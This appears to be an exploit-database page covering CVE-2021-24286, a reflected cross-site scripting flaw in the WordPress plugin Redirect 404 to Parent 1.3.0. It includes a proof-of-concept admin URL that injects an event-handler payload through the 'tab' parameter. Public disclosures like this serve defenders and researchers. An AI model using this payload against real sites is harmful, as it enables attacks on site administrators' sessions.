68d01808ce
6 changes to exploits/shellcodes Mitrastar GPT-2541GNAC-N1 - Privilege escalation Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
13 lines
No EOL
566 B
Text
13 lines
No EOL
566 B
Text
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 2/3/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
|
|
# Version: 1.3.0
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24286
|
|
|
|
1. Description:
|
|
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
|
|
|
|
2. Proof of Concept:
|
|
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); |